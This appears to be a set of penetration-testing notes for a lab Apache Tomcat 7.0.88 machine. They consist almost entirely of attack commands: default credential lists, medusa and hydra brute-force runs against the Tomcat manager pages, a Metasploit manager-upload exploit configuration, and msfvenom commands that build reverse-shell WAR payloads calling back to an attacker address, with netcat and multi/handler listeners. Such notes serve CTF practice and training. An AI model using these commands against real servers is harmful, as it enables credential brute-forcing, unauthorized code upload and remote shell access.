Apache Tomcat/7.0.88

http://$IP:8080/manager/status
http://$IP:8080/manager/html
http://$IP:8080/host-manager/html

User	Pass
admin	password
admin
admin	Password1
admin	password1
admin	admin
admin	tomcat
both	tomcat
manager	manager
role1	role1
role1	tomcat
role	changethis
root	Password1
root	changethis
root	password
root	password1
root	r00t
root	root
root	toor
tomcat	tomcat
tomcat	s3cret
tomcat	password1
tomcat	password
tomcat
tomcat	admin
tomcat	changethis

Reconnaissance

ping

ping -c 1 $IP
64 bytes from 10.10.10.95: icmp_seq=1 ttl=127 time=46.8 ms

nmap

nmap -p 8080 -Pn -sC -sV $IP

Enumeration

user.txt

admin
both
manager
role
role1
root
tomcat

pass.txt

password
admin
changethis
manager
password
password1
Password1
r00t
role1
root
s3cret
tomcat
toor

medusa - /manager/status

medusa -h $IP -n 8080 -U user.txt -P pass.txt -M  http -m DIR:/manager/status -T 10

hydra - /manager/status

hydra -L user.txt -P pass.txt -s 8080 -f $IP http-get /manager/status

medusa - /manager/html

medusa -h $IP -n 8080 -U user.txt -P pass.txt -M  http -m DIR:/manager/html -T 10

hydra - /manager/html

hydra -L user.txt -P pass.txt -s 8080 -f $IP http-get /manager/html

medusa - /host-manager/html

medusa -h $IP -n 8080 -U user.txt -P pass.txt -M  http -m DIR:/host-manager/html -T 10

hydra - /host-manager/html

hydra -L user.txt -P pass.txt -s 8080 -f $IP http-get /host-manager/html

Explotation

https://www.exploit-db.com/exploits/31433
https://www.rapid7.com/db/modules/exploit/multi/http/tomcat_mgr_upload/
https://www.revshells.com/

exploit1 - metasploit

use exploit/multi/http/tomcat_mgr_uploa
set RHOST 10.10.10.95
set RPORT 8080
set LHOST 10.10.14.16
set LPORT 4444
set HttpUsername tomcat
set HttpPassword s3cret
options
run

explot 2 - shell.war

payload

msfvenom -p java/shell_reverse_tcp LHOST=10.10.14.16 LPORT=4444 -f war -o shell.war

listener

nc -lvnp 4444

explot 3 - shell.war

payload

msfvenom -p java/meterpreter/reverse_tcp LHOST=10.10.14.16 LPORT=4444 -f war -o shell2.war

listener

msfconsole -q -x "use multi/handler; set payload java/meterpreter/reverse_tcp; set lhost 10.10.14.16; set lport 4444; exploit"